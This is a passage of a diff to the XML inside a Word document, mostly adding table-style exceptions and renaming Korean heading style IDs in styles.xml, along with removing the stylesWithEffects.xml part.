+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
@@ -4340,7 +4862,7 @@
     <w:name w:val="heading 1"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="1Char"/>
+    <w:link w:val="10"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rsid w:val="00431F07"/>
@@ -4358,7 +4880,7 @@
     <w:name w:val="heading 2"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="2Char"/>
+    <w:link w:val="20"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -4375,7 +4897,7 @@
     <w:name w:val="heading 3"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="3Char"/>
+    <w:link w:val="30"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -4393,7 +4915,7 @@
     <w:name w:val="heading 4"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="4Char"/>
+    <w:link w:val="40"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -4435,8 +4957,8 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
-    <w:name w:val="제목 1 Char"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="10">
+    <w:name w:val="제목 1 문자"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="1"/>
     <w:uiPriority w:val="9"/>
@@ -4447,8 +4969,8 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
-    <w:name w:val="제목 2 Char"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="20">
+    <w:name w:val="제목 2 문자"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="2"/>
     <w:uiPriority w:val="9"/>
@@ -4457,8 +4979,8 @@
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
-    <w:name w:val="제목 3 Char"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="30">
+    <w:name w:val="제목 3 문자"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="3"/>
     <w:uiPriority w:val="9"/>
@@ -4467,8 +4989,8 @@
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
-    <w:name w:val="제목 4 Char"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="40">
+    <w:name w:val="제목 4 문자"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="4"/>
     <w:uiPriority w:val="9"/>
@@ -4487,6 +5009,7 @@
       <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblBorders>
         <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
         <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -4495,6 +5018,12 @@
         <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
         <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
       </w:tblBorders>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
     </w:tblPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="a4">
@@ -4510,7 +5039,7 @@
   <w:style w:type="paragraph" w:styleId="a5">
     <w:name w:val="Balloon Text"/>
     <w:basedOn w:val="a"/>
-    <w:link w:val="Char"/>
+    <w:link w:val="a6"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -4524,379 +5053,8 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
-    <w:name w:val="풍선 도움말 텍스트 Char"/>
-    <w:basedOn w:val="a0"/>
-    <w:link w:val="a5"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:rsid w:val="009A2F22"/>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:sz w:val="18"/>
-      <w:szCs w:val="18"/>
-    </w:rPr>
-  </w:style>
-</w:styles>
-</file>
-
-<file path=word/stylesWithEffects.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
-  <w:docDefaults>
-    <w:rPrDefault>
-      <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-        <w:kern w:val="2"/>
-        <w:szCs w:val="22"/>
-        <w:lang w:val="en-US" w:eastAsia="ko-KR" w:bidi="ar-SA"/>
-      </w:rPr>
-    </w:rPrDefault>
-    <w:pPrDefault>
-      <w:pPr>
-        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:pPrDefault>
-  </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
-  </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="a">
-    <w:name w:val="Normal"/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:widowControl w:val="0"/>
-      <w:wordWrap w:val="0"/>
-      <w:autoSpaceDE w:val="0"/>
-      <w:autoSpaceDN w:val="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="1">
-    <w:name w:val="heading 1"/>
-    <w:basedOn w:val="a"/>
-    <w:next w:val="a"/>
-    <w:link w:val="1Char"/>
-    <w:uiPriority w:val="9"/>
-    <w:qFormat/>
